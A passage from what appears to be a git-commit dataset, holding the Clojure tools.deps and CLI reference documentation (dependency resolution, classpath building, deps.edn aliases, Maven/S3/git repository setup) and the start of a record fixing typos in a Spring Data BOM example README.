make-classpath aliases, ex: -C:dev\n-Oalias... Concatenated jvm option aliases, ex: -O:mem\n-Malias... Concatenated clojure.main option aliases, ex: -M:myapp\n-Aalias... 
Concatenated aliases of any type\n-Sdeps DEPS Deps data to use as the final deps file\n-Spath Compute classpath and echo to stdout only\n-Scp CP Do NOT compute or cache classpath, use this one instead\n-Srepro Ignore the ~\/.clojure\/deps.edn config file\n-Sforce Force recomputation of the classpath (don't use the cache)\n-Spom Generate (or update an existing) pom.xml with deps and paths\n-Stree Print dependency tree\n-Sresolve-tags Resolve git coordinate tags to shas and update deps.edn\n-Sverbose Print important path info to console\n-Sdescribe Print environment and command parsing info as data\n----\n\ninit-opt:\n\n----\n-i, --init path Load a file or resource\n-e, --eval string Eval exprs in string; print non-nil values\n----\n\nmain-opt:\n\n----\n-m, --main ns-name Call the -main function from namespace w\/args\n-r, --repl Run a repl\npath Run a script from a file or resource\n- Run a script from standard input\n-h, -?, --help Print this help message and exit\n----\n\n=== Classpath construction\n\nThe following process is used to construct the classpath for invoking clojure.main:\n\n* Compute the deps map\n** Read the deps.edn configuration files in the following locations:\n*** Install directory (unless -Srepro)\n*** Config directory (if it exists and unless -Srepro)\n*** Current directory (if it exists)\n*** -Sdeps data (if it exists)\n** Combine the deps.edn maps in that order with `merge-with merge` (except for :paths where last wins)\n* Compute the resolve-deps args\n** If `-R` specifies one or more aliases, find each alias in the deps map `:aliases`\n** `merge-with` `merge` the alias maps - the result is the resolve-args map\n* Invoke `resolve-deps` with deps map and resolve-args map\n* Compute the classpath-overrides map\n** If `-C` specifies one or more aliases, find each alias in the deps map `:aliases`\n** `merge` the classpath-override alias maps\n* Invoke `make-classpath` with the libs map returned by `resolve-deps`, the paths, and the classpath-args map\n\n=== Classpath caching\n\nClasspath files are cached in the current directory under `.cpcache\/`. Files are of two forms:\n\n* `.cpcache\/<hash>.libs` - a `::lib-map` in the https:\/\/github.com\/clojure\/tools.deps.alpha\/blob\/master\/src\/main\/clojure\/clojure\/tools\/deps\/alpha\/specs.clj[specs], the output of running `resolve-deps`\n* `.cpcache\/<hash>.cp` - a classpath string, the output of `make-classpath`\n\nwhere the `<hash>` is based on the config file paths, the resolve-aliases, and the classpath aliases.\n\nThe cached classpath file is used when:\n\n* It exists\n* It is newer than all `deps.edn` files\n\n== Installers\n\nFor tools installation, see the instructions in the <<xref\/..\/..\/guides\/getting_started#,Getting Started>> guide.\n\n== Glossary\n\n**Library**\n\nAn independently-developed chunk of code residing in a directory hierarchy under a root. We will narrow to those libraries that can be globally named, e.g. `my.namespace\/my-lib`.\n\n**Artifact**\n\nA snapshot of a library, captured at a point in time, possibly subjected to some build process, labeled with a version, containing some manifest documenting its dependencies, and packaged in e.g. a jar.\n\n**Coordinate**\n\nA particular version of a library chosen for use, with information sufficient to obtain and use the library.\n\n**Dependency**\n\nAn expression, at the project\/library level, that the declaring library needs the declared library in order to provide some of its functions. 
Must at least specify library name, might also specify version and other attrs. Actual (functional) dependencies are more fine-grained. \n\nDependency types:\n\n* maven artifacts\n* unversioned libraries - a file location identifying a jar or directory root\n* git coordinates\n\n**Classpath (and roots\/paths)**\n\nAn ordered list of local 'places' (filesystem directories and\/or jars) that will form root paths for searches of requires\/imports at runtime, supplied as an argument to Java which controls the semantics. We discourage order-dependence in the classpath, which implies something is duplicated (and thus likely broken).\n\n**Expansion**\n\nGiven a set of root dependencies, a full walk of the transitive dependencies.\n\n**Resolution**\n\nGiven a collection of root dependencies and additional modifications, creates a fully-expanded dependency tree, then produces a mapping from each library mentioned to a single version to be used that would satisfy all dependents, as well as the local path. We will also include those dependents for each entry. Conflicts arise only if libraries depend on different major versions of a library.\n\n**Classpath creation**\n\nCreates a classpath from a resolved lib-map and optional extra local lib paths. Current plan for lib-map does not provide for control over resulting order.\n\n**Version**\n\nA human numbering system whose interpretation is determined by convention. Usually x.y.z. Must protect against 'semver' interpretation, which allows libraries to break users while keeping the name the same. Ascending by convention - higher numbers are 'later', vague compatibility with lower\/earlier.\n\n**Version difference**\n\nThis occurs when the dependency expansion contains the same library with more than one \"version\" specified but where there is a relative ordering (either by number or by SHA etc). Version differences can be resolved by choosing the \"later\" or \"newest\" version when that relationship can be established.\n\n**Version conflict**\n\nA version conflict occurs when the dependency expansion contains the same library with more than one \"version\" such that the best choice cannot be automatically chosen:\n\n* semver version breakage (major version changed)\n* github shas that do not contain any common root or ancestry (two shas on different branches or unrelated repos, for example)\n* versions that cross different repos or repo types such that no relative relationship can be established\n\n**Maven Repo**\n\nA repository of library artifacts - e.g. Maven central or Clojars\n\n**Requires and imports**\n\nMentions in source code of library (sub)components that must be in the classpath in order to succeed. namespace and package\/class names are transformed into path components.\n\n== Tools\n\nSee the project's wiki for a https:\/\/github.com\/clojure\/tools.deps.alpha\/wiki\/Tools[list of tools that use or work with tools.deps.alpha (or the clojure tools)] - tools for project creation, packaging, and much more.\n","old_contents":"Alex Miller\n2017-11-30\n:type: reference\n:toc: macro\n:icons: font\n:prevpagehref: lisps\n:prevpagetitle: Differences with Lisps\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\n== Rationale\n\nClojure \"endeavors to be a general-purpose language suitable in those areas where Java is suitable\" (from <<xref\/..\/..\/about\/rationale#,Rationale>>). To effectively target the JVM platform, Clojure needs to provide ready access to Java libraries, ideally in a way suited for dynamic development. 
In practice, this means meeting the JVM platform in two places:\n\n* the classpath used when invoking JVM processes (and\/or URLClassLoaders)\n* transitive dependency download and resolution from providers like Maven\n\nClojure build tools have traditionally taken the approach of wrapping the Maven ecosystem to gain access to Java libraries. However, they have also forced this approach on Clojure code as well, requiring a focus on artifacts that must be built and deployed (which Clojure does not require). This approach has created friction for Clojure developers, making it hard to e.g. work with libs not yet publishing artifacts, work on speculative changes w\/o artifacts or across multiple libs, or give control to a 3rd party to manage shared dependencies.\n\nClojure provides:\n\n* https:\/\/github.com\/clojure\/tools.deps.alpha[tools.deps.alpha] - a library providing a functional API for resolving dependency graphs and building classpaths that can utilize both Maven and other providers of code or artifacts\n* Command line tools (`clojure` and `clj`) that enable users to make use of this capability at the terminal to declare dependencies, assemble classpaths, and launch Clojure programs\n* System-specific installers for downloading the tools, improving the \"Getting Started\" experience\n\n== Building classpaths with tools.deps.alpha\n\nThe JVM classpath consists of a series of roots, either directory paths or the path to a jar file. Classes (and Clojure files) map via package or namespace to a path relative to a classpath root. For example, the `java.lang.String` class can be found at path `java\/lang\/String.class` and the `clojure.set` Clojure namespace may be found at paths `clojure\/set.class` (for AOT), `clojure\/set.clj`, or `clojure\/set.cljc`. When the JVM needs to load one of these files it searches each root for the relative path and loads it when found.\n\nWe divide the process of building a classpath into two primary operations: `resolve-deps` and `make-classpath`. Below is a high-level view of this process:\n\n\nimage::\/images\/content\/guides\/deps\/deps.png[\"Dep Tools\", link=\"\/images\/content\/guides\/deps\/deps.png\"]\n\n=== resolve-deps\n\n**`(resolve-deps deps args-map)`**\n\n`resolve-deps` takes an initial map of required dependencies and a map of args that modify the resolution process. It builds a full graph of transitive dependencies, resolves any version differences, and flattens that graph to a full list of dependencies required in the classpath.\n\nThe deps are a map of library to coordinate. The library is (in Maven terms) the groupId and artifactId, which are sufficient to locate the desired project. 
The coordinate is used to describe a particular version that is being requested from a particular provider (like Maven).\n\nFor example, this deps map specifies a (Maven-based) dependency:\n\n[source,clojure]\n----\n{org.clojure\/core.cache {:mvn\/version \"0.6.5\"}}\n----\n\n`resolve-deps` expands these dependencies to include all transitive dependencies, cuts cycles, resolves version differences, downloads required artifacts from the provider, and produces a *lib map* of the flattened set of all needed dependencies and where to find their artifacts:\n\n[source,clojure]\n----\n{org.clojure\/core.cache {:mvn\/version \"0.6.5\",\n :deps\/manifest :mvn,\n :paths [\"...\/core.cache-0.6.5.jar\"]}\n org.clojure\/data.priority-map {:mvn\/version \"0.0.7\",\n :deps\/manifest :mvn,\n :dependents [org.clojure\/core.cache],\n :paths [\"...\/data.priority-map-0.0.7.jar\"]} \n ... }\n----\n\nThe lib map lists all libraries, their selected coordinates, the `:paths` on disk, and, for each, the list of dependents that caused it to be included. Here you can see that `data.priority-map` was included as a dependency of core.cache.\n\nThe second `args-map` is a map of optional modifications to the standard expansion to account for common use cases: adding extra dependencies, overriding deps, and default deps. These can be used separately or together, or not at all:\n\n[source,clojure]\n----\n{:extra-deps { ... }\n :override-deps { ... }\n :default-deps { ... }}\n----\n\n`:extra-deps` is the most common modification - it allows you to optionally add extra dependencies to the base dependency set. The value is a map of library to coordinate:\n\n[source,clojure]\n----\n{:extra-deps {criterium\/criterium {:mvn\/version \"0.4.4\"}}}\n----\n\n`:override-deps` overrides the coordinate version chosen by the version resolution to force a particular version instead. This also takes a map of library to coordinate:\n\n[source,clojure]\n----\n{:override-deps {org.clojure\/clojure {:mvn\/version \"1.9.0\"}}}\n----\n\n`:default-deps` provides a set of default coordinate versions to use if no coordinate is specified. The default deps can be used across a set of shared projects to act as a dependency management system:\n\n[source,clojure]\n----\n{:default-deps {org.clojure\/core.cache {:mvn\/version \"0.6.4\"}}}\n----\n\n=== make-classpath\n\n**`(make-classpath lib-map paths args-map)`**\n\nThe `make-classpath` step takes the lib map (the result of `resolve-deps`), the internal source paths of the project `[\"src\"]`, an args-map of optional modifications, and produces a classpath string for use in the JVM.\n\nThe args-map includes support for modifications to be applied while making the classpath: adding extra paths, and overriding the location of libraries specified in the lib map. These modifications can be used separately or together, or not at all in a map like this:\n\n[source,clojure]\n----\n{:extra-paths [ ... ]\n :classpath-overrides { ... }}\n----\n\n`:extra-paths` is used to include source paths in addition to your standard source paths, for example to include directories of test source:\n\n[source,clojure]\n----\n{:extra-paths [\"test\" \"resources\"]}\n----\n\n`:classpath-overrides` specifies a location to pull a dependency that overrides the path found during dependency resolution, for example to replace a dependency with a local debug version. 
Many of these use cases are ones where you would be tempted to prepend the classpath to \"override\" something else.\n\n[source,clojure]\n----\n{:classpath-overrides \n {org.clojure\/clojure \"\/my\/clojure\/target\"}}\n----\n\n== Command line tools\n\n=== Directories\n\nThe tools rely on several directories and optionally on several environment variables.\n\n* Installation directory\n** Created during installation\n** Contents:\n*** `bin\/clojure` - main tool\n*** `bin\/clj` - wrapper for interactive repl use (uses `rlwrap`)\n*** `deps.edn` - install level deps.edn file, with some default deps (Clojure, etc) and provider config\n*** `example-deps.edn` - commented example that gets copied to `<config_dir>\/deps.edn`\n*** `libexec\/clojure-tools-X.Y.Z.jar` - uberjar invoked by `clojure` to construct classpaths\n* Config directory\n** Holds a deps.edn file that persists across tool upgrades and affects all projects\n** Locations used in this order:\n*** If `$CLJ_CONFIG` is set, then use `$CLJ_CONFIG` (explicit override)\n*** If `$XDG_CONFIG_HOME` is set, then use `$XDG_CONFIG_HOME\/clojure` (Freedesktop conventions)\n*** Else use `$HOME\/.clojure` (most common)\n** Contents:\n*** `deps.edn` - user deps file, defines default Clojure version and provider defaults\n* Cache directory\n** Lazily created when `clojure` is invoked without a local `deps.edn` file. Locations used in this order:\n*** If `$CLJ_CACHE` is set, then use `$CLJ_CACHE` (explicit override)\n*** If `$XDG_CACHE_HOME` is set, then use `$XDG_CACHE_HOME\/clojure` (Freedesktop conventions)\n*** Else use `config_dir\/.cpcache` (most common)\n* Project directory\n** The current directory\n** Contents:\n*** `deps.edn` - optional project deps\n*** `.cpcache` - project cache directory, same as the user-level cache directory, created if there is a `deps.edn`\n\n=== deps.edn\n\nThe configuration file format (in \"deps.edn\" files) is an edn map with top-level keys for `:deps`, `:paths`, and `:aliases`, plus provider-specific keys for configuring dependency sources.\n\nAfter installation, deps.edn configuration files can be found in (up to) three locations:\n\n- installation directory - created only at install time\n- config directory (often ~\/.clojure) - modified to change cross-project (or no-project) defaults\n- the local directory - per-project settings\n\nThe `deps.edn` files in each of these locations (if they exist) are merged to form one combined dependency configuration. The merge is done in the order above install\/config\/local, last one wins. The operation is essentially `merge-with merge`, except for the `:paths` key, where only the last one found is used (they are not combined).\n\nYou can use the `-Sverbose` option to see all of the actual directory locations.\n\n=== Dependencies\n\nDependencies are declared in deps.edn with a top level key `:deps` - a map from library to coordinate. Libraries are symbols of the form <groupID>\/<artifactId> or simply <id> if the group and artifact ID are the same. To indicate a classifier, use <groupId>\/<artifactId>$<classifier>. 
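For example, a classified dependency would be declared like this - a minimal sketch where the second library and its classifier are made up purely for illustration; only the `$<classifier>` suffix syntax is the point:

[source,clojure]
----
{:deps
 {;; plain lib: <groupId>/<artifactId>
  org.clojure/core.cache {:mvn/version "0.6.5"}
  ;; lib with a classifier appended after $
  com.example/native-lib$linux-x86-64 {:mvn/version "1.0.0"}}}
----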
\n\nCoordinates can take several forms depending on the coordinate type:\n\n* Maven coordinate: `{:mvn\/version \"1.2.3\"}`\n** Other optional keys: `:extension`, `:exclusions`\n** Note: `:classifier` is no longer supported - add to lib name as specified above\n* Local project coordinate: `{:local\/root \"\/path\/to\/project\"}`\n** Optional key `:deps\/manifest`\n*** Specifies the project manifest type\n*** Default is to auto-detect the project type (currently either `:deps` or `:pom`)\n* Local jar: `{:local\/root \"\/path\/to\/file.jar\"}`\n** If the jar has been packaged with a pom.xml file, the pom will be read and used to find transitive deps\n* Git coordinate: `{:git\/url \"https:\/\/github.com\/user\/project.git\", :sha \"sha\", :tag \"tag\"}`\n** Required key `:git\/url` can be one of the following:\n*** https - secure anonymous access to public repos\n*** ssh or user@host form urls (including GitHub) - ssh-based access (see Git configuration section)\n** Required key `:sha` should indicate the full commit sha\n** Optional key `:tag` is used only to indicate the semantics of the sha\n** Optional key `:deps\/root`\n*** Specifies the relative path within the root to search for the manifest file\n** Optional key `:deps\/manifest` - same as in `:local` deps\n\n[source,clojure]\n----\n{:deps\n {org.clojure\/tools.reader {:mvn\/version \"1.1.1\"}\n github-sally\/awesome {:git\/url \"https:\/\/github.com\/sally\/awesome.git\", :sha \"123abcd549214b5cba04002b6875bdf59f9d88b6\"}\n ;; ... add more here\n }}\n----\n\n=== Paths\n\nPaths are declared in the top-level key `:paths` as a vector of string paths (typically relative to the project root). These source paths will be included on the classpath.\n\nWhile dependency sets are merged across all of the configuration files, only the last `:paths` value found in the config files is used; prior ones are ignored.\n\n[source,clojure]\n----\n{:paths [\"src\"]}\n----\n\n=== Aliases\n\nAliases give a name to a data structure that can be used either by the Clojure tool itself or other consumers of deps.edn. They are defined in the `:aliases` section of the config file. 
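A minimal sketch of the shape (the alias name `:test` here is arbitrary - any keyword works):

[source,clojure]
----
{:aliases
 {;; each alias maps a keyword to a data map consumed by the tools
  :test {:extra-paths ["test"]}}}
----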
These Clojure tool flags use the following well-known alias keys:\n\n* -R - uses these keys when expanding deps during `resolve-deps`:\n** `:extra-deps` - a deps map from lib to coordinate of deps to add to the deps\n** `:override-deps` - a deps map from lib to coordinate of override versions to use\n** `:default-deps` - a deps map from lib to coordinate of versions to use if none is found\n** If multiple alias maps with these keys are activated, all of them are merge-with merged\n* -C - uses these keys when creating the classpath during `make-classpath`:\n** `:extra-paths` - a collection of string paths to add to `:paths`\n** `:classpath-overrides` - a map of lib to string path to replace the location of the lib\n** If multiple maps with these keys are activated, `:extra-paths` concatenate and `:classpath-overrides` merge-with merge\n* -O - uses these keys when constructing the final command JVM options:\n** `:jvm-opts` - a collection of string JVM options\n** If multiple maps with these keys are activated, `:jvm-opts` concatenate\n** If -J JVM options are also specified on the command line, they are concatenated after the alias options\n* -M - uses these keys when constructing the final command clojure.main arguments:\n** `:main-opts` - a collection of clojure.main options\n** If multiple maps with these keys are activated, only the last one will be used\n** If command line clojure.main arguments are supplied on the command line, they are concatenated after the last main alias map\n* -A - activates all of the keys above, also these keys are only supported with -A:\n** `:deps` - a deps map from lib to coordinate of deps to REPLACE the project `:deps`\n** `:paths` a collection of string paths to REPLACE project `:paths`\n\nSo given a deps.edn like:\n\n[source,clojure]\n----\n{:paths [\"src\"]\n :deps {}\n :aliases\n {:1.7 {:override-deps {org.clojure\/clojure {:mvn\/version \"1.7.0\"}}}\n :bench {:extra-deps {criterium\/criterium {:mvn\/version \"0.4.4\"}}}\n :test {:extra-paths [\"test\"]}}}\n----\n\nYou can activate all three aliases to create a classpath that switches to an older Clojure version, adds the benchmarking library, and includes the test directory in the classpath to see how it changes the classpath:\n\n[source]\n----\nclj -R:1.7:bench -C:test -Spath\n----\n\nYou can use -A to include all types of aliases or define aliases that cross multiple alias types:\n\n[source]\n----\nclj -A:1.7:bench:test -Spath\n----\n\n=== Procurers\n\nCoordinates are interpreted by procurers, which know how to determine dependencies for a library and download artifacts. tools.deps.alpha is designed to support an extensible set of procurers that can expand over time. Currently the available procurers are: `mvn`, `local`, and `git`.\n\nThe procurer to use is determined by examining the attributes of the coordinate and using the first attribute qualifier that's found (ignoring the reserved qualifier \"deps\"). For example, a Maven coordinate contains a `:mvn\/version` attribute and a local coordinate contains a `:local\/root` attribute.\n\nProcurers may also have configuration attributes stored at the root of the configuration map under the same qualifier. The `mvn` procurer will look for `:mvn\/repos`. 
The installation deps.edn configures the default Maven repos:\n\n[source,clojure]\n----\n{:mvn\/repos\n {\"central\" {:url \"https:\/\/repo1.maven.org\/maven2\/\"}\n \"clojars\" {:url \"https:\/\/clojars.org\/repo\"}}}\n----\n\n==== Maven authenticated repos\n\nFor Maven deps in authenticated repositories, existing Maven infrastructure is used to convey credentials.\n\nIn your `~\/.m2\/settings.xml`:\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-auth-repo<\/id>\n <username>zango<\/username>\n <password>123<\/password>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nThen in your `deps.edn` include a repo with a name matching the server id (here `my-auth-repo`):\n\n[source,clojure]\n----\n{:deps\n {authenticated\/dep {:mvn\/version \"1.2.3\"}}\n :mvn\/repos\n {\"my-auth-repo\" {:url \"https:\/\/my.auth.com\/repo\"}}}\n----\n\nThen just refer to your dependencies as usual in the `:deps`.\n\n==== Maven S3 repos\n\nThe tools also provide support for connecting to public and private S3 Maven repositories.\n\nAdd a `:mvn\/repos` that includes the s3 repository root:\n\n[source,clojure]\n----\n{:deps\n {my.library {:mvn\/version \"0.1.2\"}}\n :mvn\/repos\n {\"my-private-repo\" {:url \"s3:\/\/my-bucket\/maven\/releases\"}}}\n----\n\nS3 buckets are specific to the AWS region they were created in. The s3 transporter will attempt to determine the bucket's location. If that doesn't work, you can specify the bucket region in the url explicitly: `\"s3:\/\/my-bucket\/maven\/releases?region=us-west-2\"`.\n\nFor authenticated repos, AWS credentials can be set in the `~\/.m2\/settings.xml` on a per-server basis or will be loaded ambiently from the AWS credential chain (env vars, etc). The repository name in `deps.edn` must match the server id in `settings.xml`:\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-private-repo<\/id>\n <username>AWS_ACCESS_KEY_HERE<\/username>\n <password>AWS_SECRET_ACCESS_KEY_HERE<\/password>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nAWS S3 credentials can be set in the environment using one of these mechanisms:\n\n1. Set the environment variables `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`.\n2. Create a default profile in the AWS credentials file `~\/.aws\/credentials` (older `~\/.aws\/config` also supported).\n3. Create a named profile in the AWS credentials file and set the environment variable `AWS_PROFILE` with its name.\n4. Amazon ECS container and instance profile credentials should also work, but have not been tested.\n\nFor more information, most of the advice in https:\/\/docs.aws.amazon.com\/sdk-for-java\/v1\/developer-guide\/credentials.html[this AWS document] describes how credentials are located. 
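For example, the first mechanism is just two environment variables exported before invoking the tools (the values below are placeholders):

[source,shell]
----
export AWS_ACCESS_KEY_ID=AKIAEXAMPLEKEY        # access key id
export AWS_SECRET_ACCESS_KEY=secretExampleKey  # secret access key
clj -Stree   # deps from the s3 repo should now resolve
----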
Note however that the Java system properties options will NOT work with the command line tools (but would work if using the tools.deps.alpha library directly).\n\n==== Maven proxies\n\nIn environments where the internet is accessed via a proxy, existing Maven configuration in `~\/.m2\/settings.xml` is used to set up the proxy connection:\n\n[source,xml]\n----\n<settings>\n ...\n <proxies>\n <proxy>\n <id>my-proxy<\/id>\n <host>proxy.my.org<\/host>\n <port>3128<\/port>\n <nonProxyHosts>localhost|*.my.org<\/nonProxyHosts>\n <\/proxy>\n <\/proxies>\n ...\n<\/settings>\n----\n\nRefer to the Maven https:\/\/maven.apache.org\/guides\/mini\/guide-proxies.html[Guide to using proxies] for further details.\n\n==== Maven HTTP headers\n\nFor adding custom headers to outgoing HTTP requests, existing Maven configuration in `~\/.m2\/settings.xml` is used.\n\n[source,xml]\n----\n<settings>\n ...\n <servers>\n <server>\n <id>my-token-repo<\/id>\n <configuration>\n <httpHeaders>\n <property>\n <name>Private-Token<\/name>\n <value>abc123<\/value>\n <\/property>\n <\/httpHeaders>\n <\/configuration>\n <\/server>\n ...\n <\/servers>\n ...\n<\/settings>\n----\n\nThe server id in `settings.xml` must match the repository name in `deps.edn`:\n\n[source,clojure]\n----\n{:mvn\/repos\n {\"my-token-repo\" {:url \"https:\/\/my.auth.com\/repo\"}}}\n----\n\nThis mechanism is used by repositories that authenticate using a token, rather than by username and password.\n\n==== Git configuration\n\nThe supported git url protocols are https and ssh. https repos will be accessed anonymously and require no additional authentication information. This approach is recommended for public repos.\n\nssh repos may be either public or private. Access to a git repo via ssh requires an ssh keypair. The private key of this keypair may or may not have a passphrase. ssh authentication works by connecting to the local ssh agent (ssh-agent on *nix or Pageant via PuTTY on Windows).\nThe ssh-agent must have a registered identity for the key being used to access the Git repository.\nTo check whether you have registered identities, use:\n\n[source,shell]\n----\n$ ssh-add -l\n2048 SHA256:S2SMY1YRTRFg3sqsMy1eTve4ag78XEzhbzzdVxZroDk \/Users\/me\/.ssh\/id_rsa (RSA)\n----\n\nwhich should return one or more registered identities, typically the one at `~\/.ssh\/id_rsa`.\n\nFor more information on creating keys and using the ssh-agent to manage your ssh identities, GitHub provides excellent info:\n\n* https:\/\/help.github.com\/articles\/generating-a-new-ssh-key-and-adding-it-to-the-ssh-agent\/\n* https:\/\/help.github.com\/articles\/working-with-ssh-key-passphrases\/\n\n_Note: user\/password authentication is not supported for any protocol._\n\n=== Usage\n\nUsage:\n\n* `clojure [dep-opt*] [init-opt*] [main-opt] [arg*]`\n* `clj [dep-opt*] [init-opt*] [main-opt] [arg*]`\n\nThe clojure tool is a runner for Clojure. clj is a wrapper for interactive repl use. These tools ultimately construct and invoke a command-line of the form:\n\n`java [java-opt*] -cp classpath clojure.main [init-opt*] [main-opt] [arg*]`\n\nThe dep-opts are used to build the java-opts and classpath:\n\n----\n-Jopt Pass opt through in java_opts, ex: -J-Xmx512m\n-Ralias... Concatenated resolve-deps aliases, ex: -R:bench:1.9\n-Calias... Concatenated make-classpath aliases, ex: -C:dev\n-Oalias... Concatenated jvm option aliases, ex: -O:mem\n-Malias... Concatenated clojure.main option aliases, ex: -M:myapp\n-Aalias... 
Concatenated aliases of any type\n-Sdeps DEPS Deps data to use as the final deps file\n-Spath Compute classpath and echo to stdout only\n-Scp CP Do NOT compute or cache classpath, use this one instead\n-Srepro Ignore the ~\/.clojure\/deps.edn config file\n-Sforce Force recomputation of the classpath (don't use the cache)\n-Spom Generate (or update an existing) pom.xml with deps and paths\n-Stree Print dependency tree\n-Sresolve-tags Resolve git coordinate tags to shas and update deps.edn\n-Sverbose Print important path info to console\n-Sdescribe Print environment and command parsing info as data\n----\n\ninit-opt:\n\n----\n-i, --init path Load a file or resource\n-e, --eval string Eval exprs in string; print non-nil values\n----\n\nmain-opt:\n\n----\n-m, --main ns-name Call the -main function from namespace w\/args\n-r, --repl Run a repl\npath Run a script from a file or resource\n- Run a script from standard input\n-h, -?, --help Print this help message and exit\n----\n\n=== Classpath construction\n\nThe following process is used to construct the classpath for invoking clojure.main:\n\n* Compute the deps map\n** Read the deps.edn configuration file in the following locations:\n*** Install directory (unless -Srepro)\n*** Config directory (if it exists and unless -Srepro)\n*** Current directory (if it exists)\n*** -Sdeps data (if it exists)\n** Combine the deps.edn maps in that order with `merge-with merge` (except for :paths where last wins)\n* Compute the resolve-deps args\n** If `-R` specifies one or more aliases, find each alias in the deps map `:aliases`\n** `merge-with` `merge` the alias maps - the result is the resolve-args map\n* Invoke `resolve-deps` with deps map and resolve-args map\n* Compute the classpath-overrides map\n** If `-C` specifies one or more aliases, find each alias in the deps map `:aliases`\n** `merge` the classpath-override alias maps\n* Invoke `make-classpath` with the libs map returned by `resolve-deps`, the paths, and the classpath-args map\n\n=== Classpath caching\n\nClasspath files are cached in the current directory under `.cpcache\/`. Files are of two forms:\n\n* `.cpcache\/<hash>.libs` - a `::lib-map` in the https:\/\/github.com\/clojure\/tools.deps.alpha\/blob\/master\/src\/main\/clojure\/clojure\/tools\/deps\/alpha\/specs.clj[specs], the output of running `resolve-deps`\n* `.cpcache\/<hash>.cp` - a classpath string, the output of `make-classpath`\n\nwhere the `<hash>` is based on the config file paths, the resolve-aliases, and the classpath aliases.\n\nThe cached classpath file is used when:\n\n* It exists\n* It is newer than all `deps.edn` files\n\n== Installers\n\nFor tools installation, see the instructions in the <<xref\/..\/..\/guides\/getting_started#,Getting Started>> guide.\n\n== Glossary\n\n**Library**\n\nAn independently-developed chunk of code residing in a directory hierarchy under a root. We will narrow to those libraries that can be globally named, e.g. `my.namespace\/my-lib`.\n\n**Artifact**\n\nA snapshot of a library, captured at a point in time, possibly subjected to some build process, labeled with a version, containing some manifest documenting its dependencies, and packaged in e.g. a jar.\n\n**Coordinate**\n\nA particular version of a library chosen for use, with information sufficient to obtain and use the library.\n\n**Dependency**\n\nAn expression, at the project\/library level, that the declaring library needs the declared library in order to provide some of its functions. 
Must at least specify library name, might also specify version and other attrs. Actual (functional) dependencies are more fine-grained. \n\nDependency types:\n\n* maven artifacts\n* unversioned libraries - a file location identifying a jar or directory root\n* git coordinates\n\n**Classpath (and roots\/paths)**\n\nAn ordered list of local 'places' (filesystem directories and\/or jars) that will form root paths for searches of requires\/imports at runtime, supplied as an argument to Java which controls the semantics. We discourage order-dependence in the classpath, which implies something is duplicated (and thus likely broken).\n\n**Expansion**\n\nGiven a set of root dependencies, a full walk of the transitive dependencies.\n\n**Resolution**\n\nGiven a collection of root dependencies and additional modifications, creates a fully-expanded dependency tree, then produces a mapping from each library mentioned to a single version to be used that would satisfy all dependents, as well as the local path. We will also include those dependents for each entry. Conflicts arise only if libraries depend on different major versions of a library.\n\n**Classpath creation**\n\nCreates a classpath from a resolved lib-map and optional extra local lib paths. Current plan for lib-map does not provide for control over resulting order.\n\n**Version**\n\nA human numbering system whose interpretation is determined by convention. Usually x.y.z. Must protect against 'semver' interpretation, which allows libraries to break users while keeping the name the same. Ascending by convention - higher numbers are 'later', vague compatibility with lower\/earlier.\n\n**Version difference**\n\nThis occurs when the dependency expansion contains the same library with more than one \"version\" specified but where there is a relative ordering (either by number or by SHA etc). Version differences can be resolved by choosing the \"later\" or \"newest\" version when that relationship can be established.\n\n**Version conflict**\n\nA version conflict occurs when the dependency expansion contains the same library with more than one \"version\" such that the best choice cannot be automatically chosen:\n\n* semver version breakage (major version changed)\n* github shas that do not contain any common root or ancestry (two shas on different branches or unrelated repos, for example)\n* versions that cross different repos or repo types such that no relative relationship can be established\n\n**Maven Repo**\n\nA repository of library artifacts - e.g. Maven central or Clojars\n\n**Requires and imports**\n\nMentions in source code of library (sub)components that must be in the classpath in order to succeed. 
namespace and package\/class names are transformed into path components.\n\n== Tools\n\nSee the project's wiki for a https:\/\/github.com\/clojure\/tools.deps.alpha\/wiki\/Tools[list of tools that use or work with tools.deps.alpha (or the clojure tools)] - tools for project creation, packaging, and much more.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3c7e6e11d23309619a0f2638ce5bea9445762361","subject":"Fix typos in readme.","message":"Fix typos in readme.\n\nOriginal pull request #645","repos":"spring-projects\/spring-data-examples,spring-projects\/spring-data-examples,spring-projects\/spring-data-examples","old_file":"bom\/README.adoc","new_file":"bom\/README.adoc","new_contents":"= Spring Data - Release Train BOM example\n\nThis project shows the usage of the Spring Data BOM in a non-Spring-Boot project with both Maven and Gradle.\n\n== Properties\n\nIn both Maven and Gradle a couple of properties are used to define the versions of Spring Framework and Spring Data to use. For Spring Framework a plain version is used. For Spring Data we refer to the https:\/\/spring.io\/blog\/2020\/04\/30\/updates-to-spring-versions[calver revision] of the BOM. The naming of Spring Data releases uses the following conventions:\n\n** `${calver-version}-M1` -> Milestones\n** \u2026\n** `${calver-version}-RC1` -> Release candidate\n** \u2026\n** `${calver-version}` -> GA version\n** `${calver-version}` -> Services release (bugfixes) for that release train\n\n== Maven\n\nThe `<dependencyManagement \/>` section declares dependencies to the BOMs for both Spring and Spring Data, using the `import` scope and `pom` type.\n\nThe standard `<dependencies \/>` section can now list Spring Framework and Spring Data dependencies without declaring a version and still be sure all libraries are in matching versions.\n\nNote that we do not declare a Spring Framework dependency here. The import of the Spring Framework BOM nonetheless makes sure we control the version of all transitive Spring Framework dependencies pulled in by the Spring Data modules.\n\n== Gradle\n\nGradle does not support Maven BOMs (Bill of Materials) out of the box, so the first thing to do is to import the\nhttps:\/\/github.com\/spring-gradle-plugins\/dependency-management-plugin[dependency management plugin]. This example is based on Java,\nbut if you need a different language plugin (e.g. Kotlin), you can do so.\n\nThe `dependencyManagement` section can be used to import the Spring Framework BOM and Spring Data BOM.\n\nThe standard `dependencies` section can now list Spring and Spring Data dependencies without declaring a version and still\nbe sure all libraries are align with each other.\n\nNote how you do not declare a Spring Framework dependency. Nevertheless, the dependency management plugin and the Spring Framework BOM\nensures you control the version of all transitive Spring Framework dependencies pulled in by Spring Data.\n","old_contents":"= Spring Data - Release Train BOM example\n\nThis project shows the usage of the Spring Data BOM in a non-Spring-Boot project with both Maven and Gradle.\n\n== 